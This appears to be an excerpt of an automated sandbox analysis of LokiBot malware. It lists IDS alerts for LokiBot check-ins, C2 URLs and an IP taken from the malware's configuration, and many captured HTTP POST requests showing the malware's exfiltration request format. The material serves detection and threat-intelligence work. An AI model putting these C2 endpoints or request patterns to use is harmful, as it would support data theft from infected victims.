Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50069 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50082 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50082 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50082 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50082 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50085 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50085 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50085 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50085 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50090 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50090 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50090 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50090 -> 94.156.177.41:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: Joe Sandbox View

IP Address: 94.156.177.41 94.156.177.41

Source: Joe Sandbox View

ASN Name: NET1-ASBG NET1-ASBG

Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 172Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 172Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
Source: global traffic	HTTP traffic detected: POST /soja/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.41Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4FE624Content-Length: 145Connection: close
